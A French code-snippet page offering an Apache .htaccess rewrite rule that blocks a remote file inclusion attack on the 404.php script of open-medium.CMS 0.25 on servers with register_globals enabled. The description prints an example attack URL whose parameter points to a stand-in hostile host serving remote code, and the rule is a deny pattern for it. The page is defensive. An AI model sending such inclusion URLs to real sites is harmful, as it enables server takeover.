Bouts de Codes

Protection contre le hack avec 404.php

Information sur le code source

Enregistré le 09 Juin 2008 - Vu 6936 fois
Code source zippé: télécharger le zip
Impression: imprimer le code
  • Sociale bookmarking: Digg ce code sur digg.com
  • Bookmark ce code sur del.icio.us
  • Partage ce code sur Facebook
  • Bookmark ce code sur Google
  • Bookmark ce code sur Yahoo
  • Ajoute Protection contre le hack avec 404.php
Votre avis: 
 
Ecrit par :  admin
[66] sources en Apache voir
 

Description du code source

Informations sur le code source

Le script se trouve peut-être sur votre site géré par open-medium.CMS en version 0.25. La faille touche les sites dont le paramètre register_globals est à on. Une petite règle dans le fichier .htaccess permet de renvoyer un code retour 403.
Les url concernées sont de la forme :
http://www.example.com/404.php?REDSYS[MYPATH][TEMPLATES]=http://sitepourri.com/page.txt?


La meilleur protection reste de mettre register globals à off.

Code Source



.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
 

################################################################################
#                                                                              #
#                         __                   _ __  _                         #
#               __ ______/ /______ _    ______(_) /_(_)__  ___ _               #
#              / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/               #
#              \_,_/_/ /_/_/  \__/|__,__/_/ /_/\__/_/_//_/\_, /                #
#                                                        /___/                 #
#                                                                              #
#                                                                              #
################################################################################
#                                                                              #
# Titre          : Protection contre le hack avec 404.php                      #
#                                                                              #
# URL            : http://www.urlrewriting.fr/scripts57-Apache.htm             #
# Auteur         : admin                                                       #
# Date édition   : 09 Juin 2008                                                #
#                                                                              #
################################################################################

RewriteCond %{QUERY_STRING} ^(.*&)?REDSYS\[MYPATH\]\[TEMPLATES\]=http://
RewriteRule ^(.+/)?404\.php$ - [F,L]

Ajouter un commentaire

RSS
snippets


RSS
commentaires

 
Code de sécurité

Attention: Les champs marqués d'une étoile * sont obligatoires
Librairie

Langages de programmation

La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets. Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP.. Plus de 300 références facilement accessibles. Visiter

  • Apache Tomcat 5 : Serveur d'application Java ; Administration sous Windows ou Linux
  • Apache 2.0 : Guide de l'administrateur Linux
  • Précis & Concis : Apache
  • Apache en action
  • Apache
  • PHP 5.2 et APACHE 2 - Maîtrisez le développement et le déploiement de votre site web interactif [Nouvelle version]
  • Apache (version 2) : Installation, administration et sécurisation
  • Apache : La Référence
  • Serveurs LAMP : Administration de la plate-forme Web
  • Debian GNU/Linux - Services réseaux (Bind DNS, Apache, NFS, Samba, Messagerie...)